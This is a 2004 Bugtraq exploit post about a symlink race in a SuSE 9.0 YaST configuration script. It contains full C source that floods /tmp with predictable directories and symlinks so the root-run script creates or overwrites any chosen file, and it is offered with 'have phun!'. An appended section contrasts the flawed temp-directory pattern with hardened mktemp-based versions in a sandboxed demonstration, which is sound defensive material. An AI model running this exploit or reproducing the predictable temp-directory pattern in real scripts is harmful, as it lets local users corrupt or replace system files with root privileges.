Bugtraq: SuSE linux 9.0 YaST config Skribt [exploit]

From: Rene <l0om_at_excluded.org>
Date: 13 Jan 2004 20:28:15 -0000

 Author: l0om <l0om_at_excluded.org>
 Date: 12.01.2004
 page: www.excluded.org
 
 SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
  
 There is a symlink problem in the SuSEconfig.gnome-filesystem
 script. A normal user can create and overwrite every file on the
 system. This script gets executed after a configuration change by
 the setup tool YaST. So if you have installed gnome or parts of
 gnome, check this out.
  
  
 When this script gets executed by YaST after a
 configuration change it does the following:
  
 TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
 mkdir $TEMP
 touch $TEMP/list
 [...]
 echo >$TEMP/found
 [...]
  
 The env variable $RANDOM includes a random number. In my tests
 this number goes up from 1 to 33000. But also if it goes up to
 65535 it is still vulnerable to a symlink attack. This is nearly as
 bad as the symlink problem which has been found on SuSE 8.2.
 On 8.2 a SuSEconf script has created a link with the $$ at the
 file end.
  
 I have used a little exploit written in C which creates the
 directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" up to
 33000. In every directory I have created a symlink to a file
 which I want to create or to overwrite. As the filename I have
 taken the $TEMP/found and let it point to some file. In my test I
 have taken the /etc/nologin - and hey - it has worked!
  
 have phun!
  
  
*******************************************************************/
  
 #include <stdio.h>
 #include <stdlib.h>      /* exit() */
 #include <string.h>
 #include <unistd.h>      /* read(), symlink() */
 #include <sys/types.h>
 #include <sys/stat.h>    /* mkdir(), umask() */

 #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
 #define START 1
 #define END 33000

 int main(int argc, char **argv)
 {
     int i;
     char buf[150];

     printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
     printf("\t-------------------------------------------------------------\n");
     printf("\tdiscovered and written by l0om <l0om_at_excluded.org>\n");
     printf("\t WWW.EXCLUDED.ORG\n\n");

     if(argc != 2) {
         printf("usage: %s <destination-file>\n",argv[0]);
         exit(0xff);
     }

     printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
     read(STDIN_FILENO, buf, 1);   /* wait for the key press */

     umask(0000);
     printf("working\n\n");
     /* one directory per candidate value of $RANDOM */
     for(i = START; i < END; i++) {
         snprintf(buf, sizeof(buf),"%s%d",PATH,i);
         if(mkdir(buf,00777) == -1) {
             fprintf(stderr, "cannot creat directory [Nr.%d]\n",i);
             exit(0xff);
         }
         if(!(i%1000))printf(".");
         /* $TEMP/found becomes a link to the destination file */
         strcat(buf, "/found");
         if(symlink(argv[1], buf) == -1) {
             fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
             exit(0xff);
         }
     }
     printf("\ndone!\n");
     printf("next time the SuSE.gnome-filesystem script gets executed\n");
     printf("we will create or overwrite file %s\n",argv[1]);
     return(0x00);
 } /* i cant wait for the new gobbles comic!! */
Received on Jan 13 2004
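
The temp-directory pattern quoted in the post beside two hardened forms, as an added example that is not part of the original post and not SuSE's script. The function names and the scratch-directory scenario are constructed for illustration; `mktemp -d` is assumed to be available.

```shell
#!/bin/sh
# Added example, not SuSE's script. Function names and the scenario are
# constructed; nothing outside a private mktemp directory is touched.
PREFIX=tmp.SuSEconfig.gnome-filesystem

# Pattern quoted in the post: predictable name, mkdir result never checked.
# $1 = directory standing in for /tmp, $2 = value standing in for $RANDOM.
legacy_tmpdir() {
    TEMP="$1/$PREFIX.$2"
    mkdir "$TEMP" 2>/dev/null     # fails if the path exists, script carries on
    echo >"$TEMP/found"           # redirection follows whatever is already there
}

# Hardened: mktemp -d creates a new mode-0700 directory with an unpredictable
# name in one step and fails instead of reusing an existing path.
safe_tmpdir() {
    TEMP=$(mktemp -d "$1/$PREFIX.XXXXXXXXXX") || return 1
    echo >"$TEMP/found"
}

# Minimal fix if the name has to stay predictable: mkdir failure is fatal.
strict_tmpdir() {
    TEMP="$1/$PREFIX.$2"
    mkdir -m 700 "$TEMP" 2>/dev/null || return 1
    echo >"$TEMP/found"
}

# Constructed scenario: directory number 1 already exists and its "found"
# entry is a symlink to a file that must survive. Runs the function named in
# $1, prints the file's content afterwards and returns the function's status.
run_case() {
    box=$(mktemp -d "${TMPDIR:-/tmp}/symlink-demo.XXXXXX") || return 1
    echo "keep me" >"$box/victim"
    mkdir "$box/$PREFIX.1"
    ln -s "$box/victim" "$box/$PREFIX.1/found"
    "$1" "$box" 1 && rc=0 || rc=$?
    cat "$box/victim"
    rm -rf "$box"
    return "$rc"
}

for f in legacy_tmpdir safe_tmpdir strict_tmpdir; do
    out=$(run_case "$f") && rc=0 || rc=$?
    printf '%-14s victim=[%s] rc=%s\n' "$f" "$out" "$rc"
done
```

Only the legacy pattern leaves the victim file emptied. The strict variant still lets a local user block the script by pre-creating the directory, so the `mktemp -d` form is the better choice.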